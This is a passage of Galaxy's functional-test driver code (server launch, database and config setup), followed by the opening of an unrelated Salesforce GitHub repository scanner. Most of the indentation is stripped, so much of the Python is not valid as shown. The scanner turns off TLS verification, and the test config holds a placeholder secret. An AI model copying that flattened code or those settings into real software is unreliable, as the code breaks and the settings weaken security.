template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = "test/functional/tools/sample_data_manager_conf.xml"
if default_data_manager_config is not None:
data_manager_config_file = "%s,%s" % (default_data_manager_config, data_manager_config_file)
master_api_key = get_master_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
"TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
)
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
        # ... otherwise find whatever Galaxy would use as the default and
        # append the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=[], plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = "%s_TEST_DBURI" % prefix
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
                    # We bypass migrations and create the current tables directly
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
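# Illustrative sketch (not part of the original module, hypothetical path): with no
# GALAXY_TEST_DBURI set, database_conf() falls back to an sqlite file under the
# supplied directory, e.g.
#   database_conf('/tmp/gxtest')
#   -> {'check_migrate_databases': True,
#       'database_connection': 'sqlite:////tmp/gxtest/galaxy.sqlite',
#       'database_auto_migrate': False}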
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range(sleep_tries):
# directly test the app, not the proxy
conn = http_client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except socket.error as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_ports(port):
if port is not None:
yield port
raise Exception("An existing process seems bound to specified test server port [%s]" % port)
else:
random.seed()
for i in range(0, 9):
port = str(random.randint(8000, 10000))
yield port
raise Exception("Unable to open a port between %s and %s to start Galaxy server" % (8000, 10000))
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
for port in attempt_ports(port):
try:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except socket.error as e:
if e[0] == 98:
continue
raise
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
        # TODO: Do this without modifying app - that is a pretty severe violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
class classproperty(object):
def __init__(self, f):
self.f = f
def __get__(self, obj, owner):
return self.f(owner)
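# Illustrative sketch (not part of the original module): classproperty computes a value
# from the class itself rather than from an instance. The example class is hypothetical.
class _ClasspropertyExample(object):
    name = "galaxy"
    @classproperty
    def upper_name(cls):
        # Accessed as _ClasspropertyExample.upper_name, no instance needed -> "GALAXY"
        return cls.name.upper()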
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode('utf-8'))
)[20:24])
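# Illustrative note (not part of the original module): get_ip_address() relies on the
# Linux SIOCGIFADDR ioctl and expects a real interface name, e.g.
#   get_ip_address('eth0')  # -> '192.168.1.42' (hypothetical value, depends on the host)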
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
        # Ignore the port environment variable, it wasn't explicitly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper(object):
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port):
super(PasteServerWrapper, self).__init__(name, host, port)
self._app = app
self._server = server
@property
def app(self):
return self._app
def stop(self):
if self._server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self._server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self._app is not None:
log.info("Stopping application %s" % self.name)
self._app.shutdown()
log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super(UwsgiServerWrapper, self).__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
config["galaxy"]["interactivetools_prefix"] = "interactivetool"
config["galaxy"]["interactivetools_map"] = os.path.join(tempdir, "interactivetools_map.sqlite")
config['galaxy']['interactivetools_enable'] = True
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path, "r") as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
"%s:%s" % (host, port),
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for p in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(p)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex_quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
for port in attempt_ports(port):
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info("Test-managed uwsgi web server for %s started at %s:%s" % (name, host, port))
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info("Embedded paste web server for %s started at %s:%s" % (name, host, port))
return PasteServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
                # one - otherwise just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info("Functional tests will be run against external Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters={}):
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_master_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
def setup_keep_outdir():
keep_outdir = os.environ.get('GALAXY_TEST_SAVE', '')
    if keep_outdir:
try:
os.makedirs(keep_outdir)
except Exception:
pass
return keep_outdir
def target_url_parts():
host = socket.gethostbyname(os.environ.get('GALAXY_TEST_HOST', DEFAULT_WEB_HOST))
port = os.environ.get('GALAXY_TEST_PORT')
default_url = "http://%s:%s" % (host, port)
url = os.environ.get('GALAXY_TEST_EXTERNAL', default_url)
return host, port, url
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_keep_outdir",
"setup_galaxy_config",
"target_url_parts",
"TestDriver",
"wait_for_http_server",
)
|
ghscanner.py | #
# Copyright (c) 2021, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import concurrent.futures
import time
import json
import os
import multiprocessing
from github3 import GitHub, GitHubEnterprise
from contentscanner import Scanner
class GHScanner:
def __init__(self, conc=200, procs=4, public=False):
self.RateWarning = False
self.conc = conc
self.procs = procs
self.public = public
#GitHub API wrapper
if public:
self.GH = GitHub(os.getenv("GITHUB_URL"), token=os.getenv("GITHUB_AUTH"))
else:
self.GH = GitHubEnterprise(os.getenv("GITHUB_URL"), token=os.getenv("GITHUB_AUTH"), verify=False)
self.FILESCANNER = Scanner("./modules", "modules.json")
#scans all orgs in git server
def scan_all_orgs(self):
starttime = time.time()
results = {'orgs_scanned': 0, 'repos_scanned': 0, 'vulnerable': 0, 'sus': 0, 'time_elapsed': 0, 'orgs':[]}
print("Retrieving org list...")
orgslist = self.check_orgs()
print(f"Done - {len(orgslist)} items retrieved!")
try:
#chunk the list of orgs for co-processing
orgchunks = list(self.chunks(orgslist, self.procs))
processes = []
rets = []
#run each chunk with a different process
resultqueue = multiprocessing.Queue()
for chunk in orgchunks:
tmp = multiprocessing.Process(target=self.check_org_chunk, args=(resultqueue, chunk, self.conc, self.procs, self.public))
processes.append(tmp)
tmp.start()
for process in processes:
res = resultqueue.get()
rets = rets + res
for process in processes:
process.join()
results['orgs'] = rets
#error check
for org in results['orgs']:
if 'errors' in org:
for repo in org['errors']:
print(f"Retrying: {repo}...")
tmp = self.check_single_repo(org['org'], repo)
index = next((index for (index, d) in enumerate(org['repos']) if d["repo"] == repo), None)
org['repos'][index] = tmp
#do recap
results['time_elapsed'] = time.time() - starttime
results['orgs_scanned'] = len(orgslist)
return results
except Exception as e:
print(f"Error: {e} in scan_all_orgs")
# get list of orgs
def check_orgs(self):
results = []
try:
orgs = self.GH.organizations()
for org in orgs:
results.append(org.login)
except Exception as e:
#print(f"Error: {e} in check_orgs")
raise
return results
#checks a single gh organization
def check_single_org(self, org):
jsonresult = {org:[], 'errors': []}
starttime = time.time()
try:
#load up the repos for this org
repos = self.check_repos(org)
#check each repo with a new thread (up to n=conc threads)
with concurrent.futures.ThreadPoolExecutor(max_workers=self.conc) as executor:
fut = [executor.submit(self.check_single_repo, org, repository) for repository in repos]
for r in concurrent.futures.as_completed(fut):
                    # if there is an error, add it to the error list
scanresult = r.result()
if 'errors' in scanresult:
jsonresult['errors'].append(scanresult['repo'])
jsonresult[org].append(scanresult)
except Exception as e:
print(f"Error: {e} in check_single_org({org})")
jsonresult['errors'].append(f"check_single_org({org})")
